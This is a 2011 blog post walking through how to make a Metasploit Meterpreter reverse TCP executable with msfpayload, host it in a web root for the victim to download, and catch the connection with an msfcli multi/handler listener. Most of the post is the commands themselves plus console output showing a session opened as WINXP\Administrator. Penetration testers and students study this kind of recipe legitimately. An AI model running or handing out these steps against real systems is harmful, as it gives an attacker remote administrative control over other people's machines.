Saturday, March 5, 2011

Simple meterpreter call back payload

The following are commands in order to get a meterpreter session contained in a binary that will be run by the target system to connect back to the listener.

msfpayload windows/meterpreter/reverse_tcp LHOST= X > /var/www/rawr.exe

Whats happening here? well the first thing we are doing is generating the actual payload that the victim will execute. Note: we are not actually exploiting any vulnerability here, this binary simply contains the meterpreter reverse TCP connect payload (windows/meterpreter/reverse_tcp). You have to set LHOST to the actual listening box (i know, counterintuitive). X is the shortcut to "exploit" in metasploit. Normally msfpayload outputs the binary contents to stdout so you can redirect it wherever you want, here i just redirect it to rawr.exe in my web root directory so I can download it via a web browser.

What happens now (once i start apache) is I go to the victim machine, and type "" in order to download it. Once downloaded, i run it.
You need to run the following command before you run the windows binary (otherwise it will connect to nothing and you will have to re-execute the binary)

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= E

This command starts up metasploit with the arguments as conditions. msf will start the multi handler to listen for the connection, the rest of the arguments are the same as the msfpayload command. *now run the windows payload*

what should happen is you should get this:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= E
[*] Please wait while we load the module tree...

| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/

=[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 340 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11879 updated today (2011.03.05)

PAYLOAD => windows/meterpreter/reverse_tcp
[*] Started reverse handler on
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at Sat Mar 05 02:22:40 -0500 2011

meterpreter > getuid
Server username: WINXP\Administrator

No comments:

Post a Comment